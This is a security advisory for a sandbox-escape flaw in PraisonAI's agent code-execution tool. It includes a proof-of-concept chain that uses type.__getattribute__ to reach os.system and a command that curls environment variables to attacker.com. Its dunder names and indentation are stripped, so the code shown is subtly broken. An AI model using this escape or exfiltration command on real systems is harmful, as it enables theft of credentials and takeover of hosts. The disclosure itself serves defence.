PT-2026-59535 · Pypi · Praisonai
Published
2026-07-13
·
Updated
2026-07-13
CVSS v3.1
8.6
High
| Vector | AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
PraisonAI's AST-based Python sandbox can be bypassed using
type. getattribute trampoline, allowing arbitrary code execution when running untrusted agent code.Description
The
execute code direct function in praisonaiagents/tools/python tools.py uses AST filtering to block dangerous Python attributes like subclasses, globals, and bases. However, the filter only checks ast.Attribute nodes, allowing bypass via:The sandbox relies on AST-based filtering of attribute access but fails to account for dynamic attribute resolution via built-in methods such as type. getattribute , resulting in incomplete enforcement of security restrictions.
python
type. getattribute (obj, ' subclasses ') # Bypasses filterThe string
' subclasses ' is an ast.Constant, not an ast.Attribute, so it is never checked against the blocked list.Proof of Concept
python
# This code bypasses the sandbox and achieves RCE
t = type
int cls = t(1)
# Bypass blocked bases via type. getattribute
bases = t. getattribute (int cls, ' bases ')
obj cls = bases[0]
# Bypass blocked subclasses
subclasses fn = t. getattribute (obj cls, ' subclasses ')
all subclasses = subclasses fn()
# Find wrap close class
for c in all subclasses:
if t. getattribute (c, ' name ') == ' wrap close':
# Get init . globals via bypass
init = t. getattribute (c, ' init ')
glb = type(init). getattribute (init, ' globals ')
# Get system function and execute
system = glb['system']
system('curl https://attacker.com/steal --data "$(env | base64)"')Impact
This vulnerability allows attackers to escape the intended Python sandbox and execute arbitrary code with the privileges of the host process.
An attacker can:
- Access sensitive data such as environment variables, API keys, and local files
- Execute arbitrary system commands
- Modify or delete files on the system
In environments that execute untrusted code (e.g., multi-tenant agent platforms, CI/CD pipelines, or shared systems), this can lead to full system compromise, data exfiltration, and potential lateral movement within the infrastructure.
Affected Code
python
# praisonaiagents/tools/python tools.py (approximate)
def execute code direct(code, ...):
tree = ast.parse(code)
for node in ast.walk(tree):
# Only checks ast.Attribute nodes
if isinstance(node, ast.Attribute) and node.attr in blocked attrs:
raise SecurityError(...)
# Bypass: string arguments are not checked
exec(compiled, safe globals)Reporter: Lakshmikanthan K (letchupkt)
Fix
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Praisonai